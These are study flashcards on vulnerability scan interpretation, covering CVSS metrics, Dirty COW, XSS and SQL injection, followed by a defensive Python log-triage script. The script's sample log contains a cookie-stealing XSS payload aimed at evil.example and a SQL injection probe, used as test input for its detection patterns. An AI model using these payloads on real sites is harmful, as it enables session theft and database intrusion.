Chap 5 - Interpreting Vulnerability Scans Flashcards
Which one of the CVSS metrics would contain information about the type of user account an attacker must use to execute an attack?
A. AV
B. C
C. PR
D. AC
PR
The Privileges Required (PR) vector describes whether the attacker needs no user privileges, normal user privileges, or administrative user privileges to conduct the attack. The other vectors described in this question are the Attack Vector (AV), Attack Complexity (AC), and Confidentiality (C) vectors. None of them describes the account privileges an attacker must hold.
CVSS metric: AV
Attack Vector
Measures how the vulnerability can be exploited, such as locally or remotely over a network.
CVSS metric: C
Confidentiality
Assesses the potential impact on data confidentiality if the vulnerability is exploited
CVSS metric: PR
Privileges Required
Describes the level of privileges an attacker must have to exploit the vulnerability
CVSS metric: AC
Attack Complexity
Evaluates the conditions that must exist beyond the attacker’s control to exploit the vulnerability
CVSS metric: I
Integrity
Evaluates the degree of alteration to data integrity an attacker might cause
CVSS metric: A
Availability
Measures the potential disruption or unavailability of the system
CVSS metric: S
Scope
Indicates whether the exploitation of the vulnerability can affect other components outside the original security boundary
CVSS metric: UI
User Interaction
Determines whether exploiting the vulnerability requires action from another user
What are the CVSS metrics?
- Attack Vector (AV): Measures how the vulnerability can be exploited, such as locally or remotely over a network
- Attack Complexity (AC): Evaluates the conditions that must exist beyond the attacker’s control to exploit the vulnerability
- Privileges Required (PR): Describes the level of privileges an attacker must have to exploit the vulnerability
- User Interaction (UI): Determines whether exploiting the vulnerability requires action from another user
- Confidentiality (C): Assesses the potential impact on data confidentiality if the vulnerability is exploited
- Integrity (I): Evaluates the degree of alteration to data integrity an attacker might cause
- Availability (A): Measures the potential disruption or unavailability of the system
- Scope (S): Indicates whether the exploitation of the vulnerability can affect other components outside the original security boundary.
Which one of the following values for the CVSS attack complexity metric would indicate that the specified attack is simplest to exploit?
A. High
B. Medium
C. Low
D. Severe
Low
An attack complexity of “low” indicates that exploiting the vulnerability does not require any specialized conditions. A value of “high” indicates that conditions beyond the attacker’s control (such as winning a race condition) must exist. High and low are the only two possible values for this metric in CVSS v3; “medium” existed only in the older CVSS v2 Access Complexity metric, and “severe” is not a CVSS value at all.
Which one of the following values for the confidentiality, integrity, or availability CVSS metric would indicate the potential for total compromise of a system?
A. N
B. A
C. H
D. L
H
If any of these measures is marked as H, for High, it indicates the potential for a complete loss of that property (total loss of confidentiality, integrity, or availability), i.e., a total compromise of the system.
N = None
L = Low
A is not a value of these metrics; it is the abbreviation of the Availability metric itself.
What is the most recent version of CVSS that is currently available?
A. 1.0
B. 2.0
C. 2.5
D. 3.0
3.0
Version 3.0 of CVSS is the version described in this chapter and is the answer the book expects. The answer is dated: FIRST has since published CVSS v3.1 (June 2019) and CVSS v4.0 (November 2023).
Kevin recently identified a new security vulnerability and computed its CVSS base score as 6.5. Which risk category would this vulnerability fall into?
A. Low
B. Medium
C. High
D. Critical
Medium
Vulnerabilities that have a CVSS base score between 4.0 and 6.9 fall into the Medium rating category.
CVSS Score Ranges
- 0.0: None
- 0.1–3.9: Low
- 4.0–6.9: Medium
- 7.0–8.9: High
- 9.0–10.0: Critical
Which one of the following is not a common source of information that may be correlated with vulnerability scan results?
A. Logs
B. Database tables
C. SIEM
D. Configuration management system
Database tables
It is unlikely that a database table would contain information relevant to assessing a vulnerability scan report. Logs, SIEM reports, and configuration management systems are much more likely to contain relevant information.
The Dirty COW attack is an example of what type of vulnerability?
A. Malicious code
B. Privilege escalation
C. Buffer overflow
D. LDAP injection
Privilege escalation
In October 2016, security researchers announced the discovery of a Linux kernel vulnerability dubbed Dirty COW. This vulnerability, present in the Linux kernel for nine years, was extremely easy to exploit and allowed a local, unprivileged user to gain administrative (root) control of affected systems, which is the definition of a privilege escalation vulnerability. It is not malicious code: the flaw is a bug in the kernel itself, not a program the attacker delivers.
Dirty COW
Dirty COW (CVE-2016-5195) refers to a vulnerability discovered in October 2016 in the Linux kernel, a race condition in the kernel’s handling of copy-on-write (COW) memory mappings that let an unprivileged local process write to files it could only read.
This vulnerability, which had been present in the Linux kernel for nine years, was particularly dangerous because it was easy and reliable to exploit and enabled attackers to escalate from an ordinary user account to administrative (root) control over affected systems.
Which one of the following conditions would not result in a certificate warning during a vulnerability scan of a web server?
A. Use of an untrusted CA
B. Inclusion of a public encryption key
C. Expiration of the certificate
D. Mismatch in certificate name
Inclusion of a public encryption key
Digital certificates are intended to provide public encryption keys and this would not cause an error. The other circumstances are all causes for concern and would trigger an alert during a vulnerability scan.
ICS
Industrial Control Systems
SCADA
Supervisory Control and Data Acquisition
Monica discovers that an attacker posted a message attacking users who visit a web forum that she manages. Which one of the following attack types is most likely to have occurred?
A. SQL injection
B. Malware injection
C. LDAP injection
D. Cross‐site scripting
Cross‐site scripting
In a cross‐site scripting (XSS) attack, an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party.
XSS
Cross-Site Scripting (XSS) is a web application vulnerability where attackers inject malicious scripting code into a web page that executes in the browsers of unsuspecting users.
Types of XSS
- Reflected XSS: The malicious script arrives in the request (for example in a URL parameter), is echoed back by the web server in its response, and executes in the victim’s browser immediately; the victim has to be tricked into sending that request, typically via a crafted link
- Stored XSS: The script is persisted on the target server (e.g., in a database, as with a forum post) and executes in the browser of every user who later views the affected content
- DOM-based XSS: The vulnerable code is client-side JavaScript that writes attacker-controlled data (for example from the URL fragment) into the Document Object Model (DOM); the server response itself need not contain the payload, so server-side scanners and logs can miss it
Alan is reviewing web server logs after an attack and finds many records that contain semicolons and apostrophes in queries from end users. What type of attack should he suspect?
A. SQL injection
B. LDAP injection
C. Cross‐site scripting
D. Buffer overflow
SQL injection
In a SQL injection attack, the attacker seeks to use a web application to gain access to an underlying database. Apostrophes close string literals and semicolons terminate statements in SQL, so they are characteristic of injection payloads. A lone apostrophe in a name such as O’Brien is legitimate, so in log review look for these characters combined with SQL syntax (comment markers, OR 1=1, UNION SELECT).
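Both the XSS types above and Alan’s log review come down to the same task: decode the parameters in web server access logs and look for injection syntax. The block below is an added example (not from the book): it parses common-log-format lines, URL-decodes each query parameter, and tags values that show SQL injection or cross-site scripting indicators. It requires a quote or statement terminator to appear together with SQL syntax, so an apostrophe in a legitimate name is not flagged. The log lines, IP addresses (RFC 5737 documentation ranges) and the evil.example hostname are constructed for this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache/Nginx common log format: client ident user [timestamp] "METHOD target HTTP/x" status size
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# SQLi needs BOTH a quote/terminator AND SQL syntax; a lone apostrophe (O'Brien) is benign.
_SQL_QUOTE_OR_TERMINATOR = re.compile(r"['\";]")
_SQL_SYNTAX = re.compile(
    r"(--|/\*"                                          # comment markers
    r"|\b(?:or|and)\b\s*['\"\w]+\s*=\s*['\"\w]+"        # tautologies such as OR 1=1
    r"|\bunion\b\s+(?:all\s+)?\bselect\b"               # union-based extraction
    r"|\bsleep\s*\(|\bxp_cmdshell\b)",                  # time-based / MSSQL command exec
    re.IGNORECASE,
)
# XSS: tags, scheme handlers, common event handlers, cookie theft.
_XSS = re.compile(
    r"(<\s*/?\s*(?:script|img|svg|iframe|body)\b|javascript\s*:"
    r"|\bon(?:error|load|click|mouseover|focus)\s*=|document\.cookie|alert\s*\()",
    re.IGNORECASE,
)

# Constructed sample log: benign search, SQLi probe, stored-XSS forum post, legitimate apostrophe.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=laptops HTTP/1.1" 200 5123',
    '198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /search?q=%27%20OR%201%3D1%3B-- HTTP/1.1" 200 9120',
    '203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /forum/post?msg=%3Cscript%3Edocument.location'
    '%3D%27http%3A%2F%2Fevil.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 770',
    '203.0.113.9 - - [10/Oct/2023:13:56:30 +0000] "GET /profile?name=O%27Brien HTTP/1.1" 200 1044',
]


def decode_params(target):
    """Split a request target into (path, [(name, value), ...]) with both sides URL-decoded.
    Splitting on '&' before decoding keeps an encoded ';' (%3B) inside a value
    instead of letting a parser treat it as a separator."""
    parts = urlsplit(target)
    params = []
    for pair in parts.query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return unquote_plus(parts.path), params


def classify(value):
    """Return the set of attack tags ('sqli', 'xss') that a decoded parameter value trips."""
    tags = set()
    if _SQL_QUOTE_OR_TERMINATOR.search(value) and _SQL_SYNTAX.search(value):
        tags.add("sqli")
    if _XSS.search(value):
        tags.add("xss")
    return tags


def triage(lines):
    """Run the indicators over access-log lines; one finding per suspicious parameter."""
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not CLF; a real pipeline should count these rather than drop them silently
        path, params = decode_params(m.group("target"))
        for name, value in params:
            tags = classify(value)
            if tags:
                findings.append({"ip": m.group("ip"), "path": path, "param": name,
                                 "value": value, "tags": sorted(tags)})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["ip"], f["path"], f["param"], f["tags"], repr(f["value"]))
```

The decoding step matters: the raw log shows `%27` and `%3B`, not the apostrophes and semicolons Alan is looking for, so matching on undecoded lines misses encoded payloads. These are indicators for triage, not proof; correlate hits with the SIEM and the application’s own logs before escalating.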